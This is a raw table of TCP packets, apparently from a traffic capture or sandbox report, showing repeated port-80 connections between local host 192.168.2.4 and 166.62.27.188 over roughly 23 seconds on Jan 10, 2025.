Jan 10, 2025 09:00:03.977108002 CET	80	49980	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:03.977672100 CET	80	49980	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:03.978004932 CET	49980	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:03.978085041 CET	49980	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:03.982914925 CET	80	49980	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:04.092063904 CET	49986	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:04.096987009 CET	80	49986	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:04.097057104 CET	49986	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:04.097122908 CET	49986	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:04.098747969 CET	49987	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:04.102082968 CET	80	49986	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:04.102133989 CET	49986	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:04.103540897 CET	80	49987	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:04.103601933 CET	49987	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:04.103729010 CET	49987	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:04.108525038 CET	80	49987	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:05.036585093 CET	80	49987	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:05.037209034 CET	80	49987	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:05.037440062 CET	49987	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:05.037470102 CET	49987	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:05.042294025 CET	80	49987	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:05.154090881 CET	49994	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:05.158970118 CET	80	49994	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:05.159038067 CET	49994	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:05.159126997 CET	49994	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:05.161569118 CET	49995	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:05.164107084 CET	80	49994	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:05.164302111 CET	80	49994	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:05.164345026 CET	49994	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:05.166371107 CET	80	49995	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:05.166438103 CET	49995	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:05.166538000 CET	49995	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:05.171299934 CET	80	49995	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:06.095654964 CET	80	49995	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:06.096153975 CET	80	49995	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:06.096215963 CET	49995	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:06.096293926 CET	49995	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:06.101077080 CET	80	49995	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:06.213334084 CET	50002	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:06.218174934 CET	80	50002	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:06.218245029 CET	50002	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:06.218375921 CET	50002	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:06.220633030 CET	50003	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:06.223172903 CET	80	50002	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:06.223226070 CET	50002	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:06.225497007 CET	80	50003	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:06.225565910 CET	50003	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:06.225713015 CET	50003	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:06.230454922 CET	80	50003	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:07.151499987 CET	80	50003	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:07.151684999 CET	80	50003	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:07.152690887 CET	50003	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:07.152692080 CET	50003	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:07.157598972 CET	80	50003	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:07.266463041 CET	50011	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:07.271356106 CET	80	50011	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:07.271559954 CET	50011	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:07.272085905 CET	50011	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:07.273452044 CET	50012	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:07.276874065 CET	80	50011	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:07.276931047 CET	50011	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:07.278338909 CET	80	50012	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:07.278431892 CET	50012	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:07.278532028 CET	50012	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:07.283307076 CET	80	50012	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:08.226175070 CET	80	50012	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:08.226624966 CET	80	50012	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:08.226818085 CET	50012	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:08.226818085 CET	50012	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:08.231708050 CET	80	50012	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:08.343039036 CET	50021	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:08.348431110 CET	80	50021	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:08.348505974 CET	50021	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:08.348628044 CET	50021	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:08.350486040 CET	50022	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:08.355053902 CET	80	50021	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:08.355113029 CET	50021	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:08.356018066 CET	80	50022	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:08.356093884 CET	50022	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:08.356169939 CET	50022	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:08.361567020 CET	80	50022	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:09.292172909 CET	80	50022	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:09.292834044 CET	80	50022	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:09.292907953 CET	50022	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:09.292979956 CET	50022	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:09.297780037 CET	80	50022	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:09.407135963 CET	50029	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:09.411922932 CET	80	50029	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:09.412008047 CET	50029	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:09.412127972 CET	50029	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:09.413995981 CET	50030	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:09.418085098 CET	80	50029	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:09.418144941 CET	50029	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:09.418896914 CET	80	50030	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:09.418978930 CET	50030	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:09.419085979 CET	50030	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:09.423804998 CET	80	50030	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:10.347740889 CET	80	50030	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:10.349206924 CET	80	50030	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:10.349392891 CET	50030	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:10.349392891 CET	50030	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:10.354381084 CET	80	50030	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:10.463670969 CET	50038	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:10.468509912 CET	80	50038	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:10.468571901 CET	50038	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:10.468720913 CET	50038	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:10.470426083 CET	50040	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:10.473611116 CET	80	50038	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:10.473663092 CET	50038	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:10.475512028 CET	80	50040	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:10.475581884 CET	50040	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:10.475697994 CET	50040	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:10.480463028 CET	80	50040	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:11.411885023 CET	80	50040	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:11.412230968 CET	80	50040	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:11.412398100 CET	50040	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:11.412398100 CET	50040	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:11.417243004 CET	80	50040	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:11.528182983 CET	50047	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:11.533041954 CET	80	50047	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:11.533153057 CET	50047	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:11.533272982 CET	50047	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:11.535228968 CET	50048	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:11.538258076 CET	80	50047	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:11.538331985 CET	50047	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:11.540143967 CET	80	50048	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:11.540220976 CET	50048	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:11.540348053 CET	50048	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:11.545093060 CET	80	50048	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:12.471609116 CET	80	50048	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:12.472173929 CET	80	50048	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:12.472369909 CET	50048	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:12.472369909 CET	50048	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:12.477262020 CET	80	50048	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:12.586849928 CET	50056	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:12.591749907 CET	80	50056	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:12.591840029 CET	50056	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:12.591959000 CET	50056	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:12.596920967 CET	80	50056	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:12.596991062 CET	50056	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:12.611955881 CET	50057	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:12.616777897 CET	80	50057	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:12.616847038 CET	50057	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:12.616924047 CET	50057	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:12.621687889 CET	80	50057	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:13.547369957 CET	80	50057	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:13.547920942 CET	80	50057	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:13.548058987 CET	50057	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:13.548085928 CET	50057	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:13.552942991 CET	80	50057	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:13.663774014 CET	50066	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:13.669747114 CET	80	50066	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:13.670232058 CET	50066	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:13.670366049 CET	50066	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:13.672247887 CET	50067	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:13.675875902 CET	80	50066	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:13.675964117 CET	50066	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:13.677474022 CET	80	50067	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:13.677544117 CET	50067	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:13.677695990 CET	50067	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:13.682522058 CET	80	50067	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:14.621083975 CET	80	50067	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:14.621131897 CET	80	50067	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:14.621232033 CET	50067	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:14.621344090 CET	50067	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:14.626158953 CET	80	50067	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:14.736104012 CET	50073	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:14.741056919 CET	80	50073	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:14.741267920 CET	50073	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:14.741395950 CET	50073	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:14.743540049 CET	50074	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:14.746459007 CET	80	50073	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:14.746534109 CET	50073	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:14.748486996 CET	80	50074	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:14.748586893 CET	50074	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:14.748699903 CET	50074	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:14.753540993 CET	80	50074	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:15.668155909 CET	80	50074	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:15.668719053 CET	80	50074	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:15.668824911 CET	50074	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:15.668869019 CET	50074	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:15.673691988 CET	80	50074	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:15.783369064 CET	50082	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:15.788180113 CET	80	50082	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:15.788237095 CET	50082	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:15.788357019 CET	50082	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:15.790175915 CET	50084	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:15.793232918 CET	80	50082	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:15.793291092 CET	50082	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:15.795000076 CET	80	50084	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:15.795185089 CET	50084	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:15.795185089 CET	50084	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:15.800013065 CET	80	50084	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:16.716309071 CET	80	50084	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:16.716814041 CET	80	50084	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:16.716897964 CET	50084	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:16.716988087 CET	50084	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:16.721822023 CET	80	50084	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:16.831481934 CET	50092	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:16.836539984 CET	80	50092	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:16.836647034 CET	50092	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:16.836755991 CET	50092	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:16.838525057 CET	50093	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:16.841687918 CET	80	50092	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:16.841758966 CET	50092	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:16.843457937 CET	80	50093	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:16.843533039 CET	50093	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:16.843628883 CET	50093	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:16.848444939 CET	80	50093	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:17.776226044 CET	80	50093	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:17.776376009 CET	80	50093	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:17.776468039 CET	50093	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:17.776546955 CET	50093	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:17.781332970 CET	80	50093	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:17.892469883 CET	50100	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:17.897558928 CET	80	50100	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:17.898066044 CET	50100	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:17.900568962 CET	50100	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:17.903168917 CET	50101	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:17.905476093 CET	80	50100	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:17.905559063 CET	50100	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:17.908016920 CET	80	50101	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:17.908124924 CET	50101	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:17.908320904 CET	50101	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:17.913243055 CET	80	50101	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:18.830769062 CET	80	50101	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:18.831016064 CET	80	50101	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:18.831084013 CET	50101	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:18.831378937 CET	50101	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:18.836266994 CET	80	50101	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:18.954329014 CET	50107	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:18.959218979 CET	80	50107	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:18.959295988 CET	50107	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:18.959460020 CET	50107	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:18.961977005 CET	50108	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:18.964481115 CET	80	50107	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:18.964596987 CET	50107	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:18.966784000 CET	80	50108	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:18.966871023 CET	50108	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:18.966984987 CET	50108	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:18.971724987 CET	80	50108	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:19.910593033 CET	80	50108	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:19.910665989 CET	80	50108	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:19.910784006 CET	50108	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:19.910868883 CET	50108	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:19.915671110 CET	80	50108	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:20.031014919 CET	50115	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:20.035969973 CET	80	50115	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:20.036087036 CET	50115	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:20.036250114 CET	50115	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:20.038383961 CET	50116	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:20.041198969 CET	80	50115	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:20.041279078 CET	50115	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:20.043358088 CET	80	50116	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:20.043448925 CET	50116	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:20.043621063 CET	50116	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:20.048482895 CET	80	50116	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:20.966774940 CET	80	50116	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:20.967271090 CET	80	50116	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:20.967365980 CET	50116	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:20.967453003 CET	50116	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:20.972338915 CET	80	50116	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:21.094362974 CET	50121	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:21.099304914 CET	80	50121	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:21.099375963 CET	50121	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:21.099534988 CET	50121	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:21.104403973 CET	80	50121	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:21.104455948 CET	50121	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:21.128681898 CET	50122	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:21.133601904 CET	80	50122	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:21.133687019 CET	50122	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:21.133877993 CET	50122	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:21.138772011 CET	80	50122	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:22.050848961 CET	80	50122	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:22.051062107 CET	80	50122	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:22.051851988 CET	50122	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:22.051852942 CET	50122	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:22.057473898 CET	80	50122	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:22.173751116 CET	50123	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:22.179008961 CET	80	50123	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:22.179111004 CET	50123	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:22.179235935 CET	50123	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:22.181971073 CET	50124	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:22.184154987 CET	80	50123	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:22.184231997 CET	50123	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:22.186913967 CET	80	50124	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:22.186988115 CET	50124	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:22.187096119 CET	50124	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:22.192044973 CET	80	50124	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:23.134906054 CET	80	50124	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:23.135168076 CET	80	50124	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:23.135833979 CET	50124	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:23.135917902 CET	50124	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:23.140836000 CET	80	50124	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:23.257904053 CET	50125	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:23.262933016 CET	80	50125	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:23.266060114 CET	50125	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:23.266210079 CET	50125	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:23.271281958 CET	80	50125	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:23.271697044 CET	50126	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:23.271716118 CET	50125	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:23.276557922 CET	80	50126	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:23.276649952 CET	50126	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:23.276742935 CET	50126	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:23.281524897 CET	80	50126	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:24.223851919 CET	80	50126	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:24.223973989 CET	80	50126	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:24.224040985 CET	50126	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:24.224169970 CET	50126	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:24.229101896 CET	80	50126	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:24.346740007 CET	50127	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:24.352088928 CET	80	50127	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:24.352200031 CET	50127	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:24.352315903 CET	50127	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:24.354665995 CET	50128	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:24.357343912 CET	80	50127	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:24.357415915 CET	50127	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:24.359546900 CET	80	50128	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:24.359628916 CET	50128	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:24.359713078 CET	50128	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:24.364511013 CET	80	50128	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:25.264719963 CET	80	50128	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:25.265177011 CET	80	50128	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:25.266144037 CET	50128	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:25.266287088 CET	50128	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:25.272018909 CET	80	50128	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:25.384663105 CET	50129	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:25.389830112 CET	80	50129	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:25.389909983 CET	50129	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:25.390033960 CET	50129	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:25.395073891 CET	80	50129	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:25.395139933 CET	50129	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:25.441215038 CET	50130	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:25.446974993 CET	80	50130	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:25.447058916 CET	50130	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:25.447155952 CET	50130	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:25.452027082 CET	80	50130	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:26.358365059 CET	80	50130	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:26.358660936 CET	80	50130	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:26.358715057 CET	50130	80	192.168.2.4	166.62.27.188
